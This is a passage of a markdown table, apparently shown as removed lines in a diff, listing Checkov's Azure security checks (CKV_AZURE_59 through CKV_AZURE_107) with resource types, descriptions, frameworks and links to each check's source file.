-| 1714 | CKV_AZURE_59 | resource | azurerm_storage_account | Ensure that Storage accounts disallow public access | Terraform | [StorageAccountDisablePublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountDisablePublicAccess.py) |
-| 1715 | CKV_AZURE_61 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for App Service | Terraform | [AzureDefenderOnAppServices.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnAppServices.py) |
-| 1716 | CKV_AZURE_62 | resource | azurerm_function_app | Ensure function apps are not accessible from all regions | Terraform | [FunctionAppDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppDisallowCORS.py) |
-| 1717 | CKV_AZURE_63 | resource | Microsoft.Web/sites/config | Ensure that App service enables HTTP logging | arm | [AppServiceHttpLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHttpLoggingEnabled.py) |
-| 1718 | CKV_AZURE_63 | resource | Microsoft.Web/sites/config | Ensure that App service enables HTTP logging | Bicep | [AppServiceHttpLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHttpLoggingEnabled.py) |
-| 1719 | CKV_AZURE_63 | resource | azurerm_app_service | Ensure that App service enables HTTP logging | Terraform | [AppServiceHttpLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttpLoggingEnabled.py) |
-| 1720 | CKV_AZURE_63 | resource | azurerm_linux_web_app | Ensure that App service enables HTTP logging | Terraform | [AppServiceHttpLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttpLoggingEnabled.py) |
-| 1721 | CKV_AZURE_63 | resource | azurerm_windows_web_app | Ensure that App service enables HTTP logging | Terraform | [AppServiceHttpLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttpLoggingEnabled.py) |
-| 1722 | CKV_AZURE_64 | resource | azurerm_storage_sync | Ensure that Azure File Sync disables public network access | Terraform | [StorageSyncPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageSyncPublicAccessDisabled.py) |
-| 1723 | CKV_AZURE_65 | resource | Microsoft.Web/sites/config | Ensure that App service enables detailed error messages | arm | [AppServiceDetailedErrorMessagesEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceDetailedErrorMessagesEnabled.py) |
-| 1724 | CKV_AZURE_65 | resource | Microsoft.Web/sites/config | Ensure that App service enables detailed error messages | Bicep | [AppServiceDetailedErrorMessagesEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceDetailedErrorMessagesEnabled.py) |
-| 1725 | CKV_AZURE_65 | resource | azurerm_app_service | Ensure that App service enables detailed error messages | Terraform | [AppServiceDetailedErrorMessagesEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDetailedErrorMessagesEnabled.py) |
-| 1726 | CKV_AZURE_65 | resource | azurerm_linux_web_app | Ensure that App service enables detailed error messages | Terraform | [AppServiceDetailedErrorMessagesEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDetailedErrorMessagesEnabled.py) |
-| 1727 | CKV_AZURE_65 | resource | azurerm_windows_web_app | Ensure that App service enables detailed error messages | Terraform | [AppServiceDetailedErrorMessagesEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDetailedErrorMessagesEnabled.py) |
-| 1728 | CKV_AZURE_66 | resource | Microsoft.Web/sites/config | Ensure that App service enables failed request tracing | arm | [AppServiceEnableFailedRequest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceEnableFailedRequest.py) |
-| 1729 | CKV_AZURE_66 | resource | Microsoft.Web/sites/config | Ensure that App service enables failed request tracing | Bicep | [AppServiceEnableFailedRequest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceEnableFailedRequest.py) |
-| 1730 | CKV_AZURE_66 | resource | azurerm_app_service | Ensure that App service enables failed request tracing | Terraform | [AppServiceEnableFailedRequest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceEnableFailedRequest.py) |
-| 1731 | CKV_AZURE_66 | resource | azurerm_linux_web_app | Ensure that App service enables failed request tracing | Terraform | [AppServiceEnableFailedRequest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceEnableFailedRequest.py) |
-| 1732 | CKV_AZURE_66 | resource | azurerm_windows_web_app | Ensure that App service enables failed request tracing | Terraform | [AppServiceEnableFailedRequest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceEnableFailedRequest.py) |
-| 1733 | CKV_AZURE_67 | resource | azurerm_function_app | Ensure that 'HTTP Version' is the latest, if used to run the Function app | Terraform | [FunctionAppHttpVersionLatest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppHttpVersionLatest.py) |
-| 1734 | CKV_AZURE_67 | resource | azurerm_function_app_slot | Ensure that 'HTTP Version' is the latest, if used to run the Function app | Terraform | [FunctionAppHttpVersionLatest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppHttpVersionLatest.py) |
-| 1735 | CKV_AZURE_68 | resource | azurerm_postgresql_server | Ensure that PostgreSQL server disables public network access | Terraform | [PostgreSQLServerPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerPublicAccessDisabled.py) |
-| 1736 | CKV_AZURE_69 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for Azure SQL database servers | Terraform | [AzureDefenderOnSqlServers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnSqlServers.py) |
-| 1737 | CKV_AZURE_70 | resource | azurerm_function_app | Ensure that Function apps is only accessible over HTTPS | Terraform | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py) |
-| 1738 | CKV_AZURE_70 | resource | azurerm_function_app_slot | Ensure that Function apps is only accessible over HTTPS | Terraform | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py) |
-| 1739 | CKV_AZURE_70 | resource | azurerm_linux_function_app | Ensure that Function apps is only accessible over HTTPS | Terraform | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py) |
-| 1740 | CKV_AZURE_70 | resource | azurerm_linux_function_app_slot | Ensure that Function apps is only accessible over HTTPS | Terraform | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py) |
-| 1741 | CKV_AZURE_70 | resource | azurerm_windows_function_app | Ensure that Function apps is only accessible over HTTPS | Terraform | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py) |
-| 1742 | CKV_AZURE_70 | resource | azurerm_windows_function_app_slot | Ensure that Function apps is only accessible over HTTPS | Terraform | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py) |
-| 1743 | CKV_AZURE_71 | resource | azurerm_app_service | Ensure that Managed identity provider is enabled for app services | Terraform | [AppServiceIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentityProviderEnabled.py) |
-| 1744 | CKV_AZURE_71 | resource | azurerm_linux_web_app | Ensure that Managed identity provider is enabled for app services | Terraform | [AppServiceIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentityProviderEnabled.py) |
-| 1745 | CKV_AZURE_71 | resource | azurerm_windows_web_app | Ensure that Managed identity provider is enabled for app services | Terraform | [AppServiceIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentityProviderEnabled.py) |
-| 1746 | CKV_AZURE_72 | resource | azurerm_app_service | Ensure that remote debugging is not enabled for app services | Terraform | [AppServiceRemoteDebuggingNotEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceRemoteDebuggingNotEnabled.py) |
-| 1747 | CKV_AZURE_72 | resource | azurerm_linux_web_app | Ensure that remote debugging is not enabled for app services | Terraform | [AppServiceRemoteDebuggingNotEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceRemoteDebuggingNotEnabled.py) |
-| 1748 | CKV_AZURE_72 | resource | azurerm_windows_web_app | Ensure that remote debugging is not enabled for app services | Terraform | [AppServiceRemoteDebuggingNotEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceRemoteDebuggingNotEnabled.py) |
-| 1749 | CKV_AZURE_73 | resource | azurerm_automation_variable_bool | Ensure that Automation account variables are encrypted | Terraform | [AutomationEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AutomationEncrypted.py) |
-| 1750 | CKV_AZURE_73 | resource | azurerm_automation_variable_datetime | Ensure that Automation account variables are encrypted | Terraform | [AutomationEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AutomationEncrypted.py) |
-| 1751 | CKV_AZURE_73 | resource | azurerm_automation_variable_int | Ensure that Automation account variables are encrypted | Terraform | [AutomationEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AutomationEncrypted.py) |
-| 1752 | CKV_AZURE_73 | resource | azurerm_automation_variable_string | Ensure that Automation account variables are encrypted | Terraform | [AutomationEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AutomationEncrypted.py) |
-| 1753 | CKV_AZURE_74 | resource | azurerm_kusto_cluster | Ensure that Azure Data Explorer (Kusto) uses disk encryption | Terraform | [DataExplorerUsesDiskEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataExplorerUsesDiskEncryption.py) |
-| 1754 | CKV_AZURE_75 | resource | azurerm_kusto_cluster | Ensure that Azure Data Explorer uses double encryption | Terraform | [AzureDataExplorerDoubleEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDataExplorerDoubleEncryptionEnabled.py) |
-| 1755 | CKV_AZURE_76 | resource | azurerm_batch_account | Ensure that Azure Batch account uses key vault to encrypt data | Terraform | [AzureBatchAccountUsesKeyVaultEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureBatchAccountUsesKeyVaultEncryption.py) |
-| 1756 | CKV_AZURE_77 | resource | azurerm_network_security_group | Ensure that UDP Services are restricted from the Internet | Terraform | [NSGRuleUDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleUDPAccessRestricted.py) |
-| 1757 | CKV_AZURE_77 | resource | azurerm_network_security_rule | Ensure that UDP Services are restricted from the Internet | Terraform | [NSGRuleUDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleUDPAccessRestricted.py) |
-| 1758 | CKV_AZURE_78 | resource | azurerm_app_service | Ensure FTP deployments are disabled | Terraform | [AppServiceFTPSState.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceFTPSState.py) |
-| 1759 | CKV_AZURE_78 | resource | azurerm_linux_web_app | Ensure FTP deployments are disabled | Terraform | [AppServiceFTPSState.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceFTPSState.py) |
-| 1760 | CKV_AZURE_78 | resource | azurerm_windows_web_app | Ensure FTP deployments are disabled | Terraform | [AppServiceFTPSState.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceFTPSState.py) |
-| 1761 | CKV_AZURE_79 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for SQL servers on machines | Terraform | [AzureDefenderOnSqlServerVMS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnSqlServerVMS.py) |
-| 1762 | CKV_AZURE_80 | resource | Microsoft.Web/sites/config | Ensure that 'Net Framework' version is the latest, if used as a part of the web app | arm | [AppServiceDotnetFrameworkVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceDotnetFrameworkVersion.py) |
-| 1763 | CKV_AZURE_80 | resource | Microsoft.Web/sites/config | Ensure that 'Net Framework' version is the latest, if used as a part of the web app | Bicep | [AppServiceDotnetFrameworkVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceDotnetFrameworkVersion.py) |
-| 1764 | CKV_AZURE_80 | resource | azurerm_app_service | Ensure that 'Net Framework' version is the latest, if used as a part of the web app | Terraform | [AppServiceDotnetFrameworkVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDotnetFrameworkVersion.py) |
-| 1765 | CKV_AZURE_80 | resource | azurerm_windows_web_app | Ensure that 'Net Framework' version is the latest, if used as a part of the web app | Terraform | [AppServiceDotnetFrameworkVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDotnetFrameworkVersion.py) |
-| 1766 | CKV_AZURE_81 | resource | azurerm_app_service | Ensure that 'PHP version' is the latest, if used to run the web app | Terraform | [AppServicePHPVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServicePHPVersion.py) |
-| 1767 | CKV_AZURE_82 | resource | azurerm_app_service | Ensure that 'Python version' is the latest, if used to run the web app | Terraform | [AppServicePythonVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServicePythonVersion.py) |
-| 1768 | CKV_AZURE_83 | resource | azurerm_app_service | Ensure that 'Java version' is the latest, if used to run the web app | Terraform | [AppServiceJavaVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceJavaVersion.py) |
-| 1769 | CKV_AZURE_84 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for Storage | Terraform | [AzureDefenderOnStorage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnStorage.py) |
-| 1770 | CKV_AZURE_85 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for Kubernetes | Terraform | [AzureDefenderOnKubernetes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnKubernetes.py) |
-| 1771 | CKV_AZURE_86 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for Container Registries | Terraform | [AzureDefenderOnContainerRegistry.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnContainerRegistry.py) |
-| 1772 | CKV_AZURE_87 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for Key Vault | Terraform | [AzureDefenderOnKeyVaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnKeyVaults.py) |
-| 1773 | CKV_AZURE_88 | resource | Microsoft.Web/sites/config | Ensure that app services use Azure Files | arm | [AppServiceUsedAzureFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceUsedAzureFiles.py) |
-| 1774 | CKV_AZURE_88 | resource | Microsoft.Web/sites/config | Ensure that app services use Azure Files | Bicep | [AppServiceUsedAzureFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceUsedAzureFiles.py) |
-| 1775 | CKV_AZURE_88 | resource | azurerm_app_service | Ensure that app services use Azure Files | Terraform | [AppServiceUsedAzureFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceUsedAzureFiles.py) |
-| 1776 | CKV_AZURE_88 | resource | azurerm_linux_web_app | Ensure that app services use Azure Files | Terraform | [AppServiceUsedAzureFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceUsedAzureFiles.py) |
-| 1777 | CKV_AZURE_88 | resource | azurerm_windows_web_app | Ensure that app services use Azure Files | Terraform | [AppServiceUsedAzureFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceUsedAzureFiles.py) |
-| 1778 | CKV_AZURE_89 | resource | Microsoft.Cache/redis | Ensure that Azure Cache for Redis disables public network access | arm | [RedisCachePublicNetworkAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/RedisCachePublicNetworkAccessEnabled.py) |
-| 1779 | CKV_AZURE_89 | resource | Microsoft.Cache/redis | Ensure that Azure Cache for Redis disables public network access | Bicep | [RedisCachePublicNetworkAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/RedisCachePublicNetworkAccessEnabled.py) |
-| 1780 | CKV_AZURE_89 | resource | azurerm_redis_cache | Ensure that Azure Cache for Redis disables public network access | Terraform | [RedisCachePublicNetworkAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/RedisCachePublicNetworkAccessEnabled.py) |
-| 1781 | CKV_AZURE_91 | resource | azurerm_redis_cache | Ensure that only SSL are enabled for Cache for Redis | Terraform | [RedisCacheEnableNonSSLPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/RedisCacheEnableNonSSLPort.py) |
-| 1782 | CKV_AZURE_92 | resource | azurerm_linux_virtual_machine | Ensure that Virtual Machines use managed disks | Terraform | [VMStorageOsDisk.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMStorageOsDisk.py) |
-| 1783 | CKV_AZURE_92 | resource | azurerm_windows_virtual_machine | Ensure that Virtual Machines use managed disks | Terraform | [VMStorageOsDisk.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMStorageOsDisk.py) |
-| 1784 | CKV_AZURE_93 | resource | Microsoft.Compute/disks | Ensure that managed disks use a specific set of disk encryption sets for the customer-managed key encryption | arm | [AzureManagedDiskEncryptionSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureManagedDiskEncryptionSet.py) |
-| 1785 | CKV_AZURE_93 | resource | Microsoft.Compute/disks | Ensure that managed disks use a specific set of disk encryption sets for the customer-managed key encryption | Bicep | [AzureManagedDiskEncryptionSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureManagedDiskEncryptionSet.py) |
-| 1786 | CKV_AZURE_93 | resource | azurerm_managed_disk | Ensure that managed disks use a specific set of disk encryption sets for the customer-managed key encryption | Terraform | [AzureManagedDiskEncryptionSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureManagedDiskEncryptionSet.py) |
-| 1787 | CKV_AZURE_94 | resource | Microsoft.DBforMySQL/flexibleServers | Ensure that My SQL server enables geo-redundant backups | arm | [MySQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLGeoBackupEnabled.py) |
-| 1788 | CKV_AZURE_94 | resource | Microsoft.DBforMySQL/flexibleServers | Ensure that My SQL server enables geo-redundant backups | Bicep | [MySQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLGeoBackupEnabled.py) |
-| 1789 | CKV_AZURE_94 | resource | azurerm_mysql_flexible_server | Ensure that My SQL server enables geo-redundant backups | Terraform | [MySQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLGeoBackupEnabled.py) |
-| 1790 | CKV_AZURE_94 | resource | azurerm_mysql_server | Ensure that My SQL server enables geo-redundant backups | Terraform | [MySQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLGeoBackupEnabled.py) |
-| 1791 | CKV_AZURE_95 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure that automatic OS image patching is enabled for Virtual Machine Scale Sets | arm | [VMScaleSetsAutoOSImagePatchingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMScaleSetsAutoOSImagePatchingEnabled.py) |
-| 1792 | CKV_AZURE_95 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure that automatic OS image patching is enabled for Virtual Machine Scale Sets | Bicep | [VMScaleSetsAutoOSImagePatchingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMScaleSetsAutoOSImagePatchingEnabled.py) |
-| 1793 | CKV_AZURE_95 | resource | azurerm_virtual_machine_scale_set | Ensure that automatic OS image patching is enabled for Virtual Machine Scale Sets | Terraform | [VMScaleSetsAutoOSImagePatchingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMScaleSetsAutoOSImagePatchingEnabled.py) |
-| 1794 | CKV_AZURE_96 | resource | Microsoft.DBforMySQL/flexibleServers | Ensure that MySQL server enables infrastructure encryption | arm | [MySQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLEncryptionEnabled.py) |
-| 1795 | CKV_AZURE_96 | resource | Microsoft.DBforMySQL/flexibleServers | Ensure that MySQL server enables infrastructure encryption | Bicep | [MySQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLEncryptionEnabled.py) |
-| 1796 | CKV_AZURE_96 | resource | azurerm_mysql_server | Ensure that MySQL server enables infrastructure encryption | Terraform | [MySQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLEncryptionEnabled.py) |
-| 1797 | CKV_AZURE_97 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure that Virtual machine scale sets have encryption at host enabled | arm | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMEncryptionAtHostEnabled.py) |
-| 1798 | CKV_AZURE_97 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure that Virtual machine scale sets have encryption at host enabled | Bicep | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMEncryptionAtHostEnabled.py) |
-| 1799 | CKV_AZURE_97 | resource | Microsoft.Compute/virtualMachines | Ensure that Virtual machine scale sets have encryption at host enabled | arm | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMEncryptionAtHostEnabled.py) |
-| 1800 | CKV_AZURE_97 | resource | Microsoft.Compute/virtualMachines | Ensure that Virtual machine scale sets have encryption at host enabled | Bicep | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMEncryptionAtHostEnabled.py) |
-| 1801 | CKV_AZURE_97 | resource | azurerm_linux_virtual_machine_scale_set | Ensure that Virtual machine scale sets have encryption at host enabled | Terraform | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMEncryptionAtHostEnabled.py) |
-| 1802 | CKV_AZURE_97 | resource | azurerm_windows_virtual_machine_scale_set | Ensure that Virtual machine scale sets have encryption at host enabled | Terraform | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMEncryptionAtHostEnabled.py) |
-| 1803 | CKV_AZURE_98 | resource | azurerm_container_group | Ensure that Azure Container group is deployed into virtual network | Terraform | [AzureContainerGroupDeployedIntoVirtualNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureContainerGroupDeployedIntoVirtualNetwork.py) |
-| 1804 | CKV_AZURE_99 | resource | azurerm_cosmosdb_account | Ensure Cosmos DB accounts have restricted access | Terraform | [CosmosDBAccountsRestrictedAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CosmosDBAccountsRestrictedAccess.py) |
-| 1805 | CKV_AZURE_100 | resource | Microsoft.DocumentDb/databaseAccounts | Ensure that Cosmos DB accounts have customer-managed keys to encrypt data at rest | arm | [CosmosDBHaveCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBHaveCMK.py) |
-| 1806 | CKV_AZURE_100 | resource | Microsoft.DocumentDb/databaseAccounts | Ensure that Cosmos DB accounts have customer-managed keys to encrypt data at rest | Bicep | [CosmosDBHaveCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBHaveCMK.py) |
-| 1807 | CKV_AZURE_100 | resource | azurerm_cosmosdb_account | Ensure that Cosmos DB accounts have customer-managed keys to encrypt data at rest | Terraform | [CosmosDBHaveCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CosmosDBHaveCMK.py) |
-| 1808 | CKV_AZURE_101 | resource | Microsoft.DocumentDB/databaseAccounts | Ensure that Azure Cosmos DB disables public network access | arm | [CosmosDBDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBDisablesPublicNetwork.py) |
-| 1809 | CKV_AZURE_101 | resource | Microsoft.DocumentDB/databaseAccounts | Ensure that Azure Cosmos DB disables public network access | Bicep | [CosmosDBDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBDisablesPublicNetwork.py) |
-| 1810 | CKV_AZURE_101 | resource | azurerm_cosmosdb_account | Ensure that Azure Cosmos DB disables public network access | Terraform | [CosmosDBDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CosmosDBDisablesPublicNetwork.py) |
-| 1811 | CKV_AZURE_102 | resource | azurerm_postgresql_server | Ensure that PostgreSQL server enables geo-redundant backups | Terraform | [PostgressSQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgressSQLGeoBackupEnabled.py) |
-| 1812 | CKV_AZURE_103 | resource | Microsoft.DataFactory/factories | Ensure that Azure Data Factory uses Git repository for source control | arm | [DataFactoryUsesGitRepository.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DataFactoryUsesGitRepository.py) |
-| 1813 | CKV_AZURE_103 | resource | Microsoft.DataFactory/factories | Ensure that Azure Data Factory uses Git repository for source control | Bicep | [DataFactoryUsesGitRepository.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DataFactoryUsesGitRepository.py) |
-| 1814 | CKV_AZURE_103 | resource | azurerm_data_factory | Ensure that Azure Data Factory uses Git repository for source control | Terraform | [DataFactoryUsesGitRepository.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataFactoryUsesGitRepository.py) |
-| 1815 | CKV_AZURE_104 | resource | azurerm_data_factory | Ensure that Azure Data factory public network access is disabled | Terraform | [DataFactoryNoPublicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataFactoryNoPublicNetworkAccess.py) |
-| 1816 | CKV_AZURE_105 | resource | azurerm_data_lake_store | Ensure that Data Lake Store accounts enables encryption | Terraform | [DataLakeStoreEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataLakeStoreEncryption.py) |
-| 1817 | CKV_AZURE_106 | resource | azurerm_eventgrid_domain | Ensure that Azure Event Grid Domain public network access is disabled | Terraform | [EventgridDomainNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridDomainNetworkAccess.py) |
-| 1818 | CKV_AZURE_107 | resource | Microsoft.ApiManagement/service | Ensure that API management services use virtual networks | arm | [APIServicesUseVirtualNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/APIServicesUseVirtualNetwork.py) |
-| 1819 | CKV_AZURE_107 | resource | Microsoft.ApiManagement/service | Ensure that API management services use virtual networks | Bicep | [APIServicesUseVirtualNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/APIServicesUseVirtualNetwork.py) |
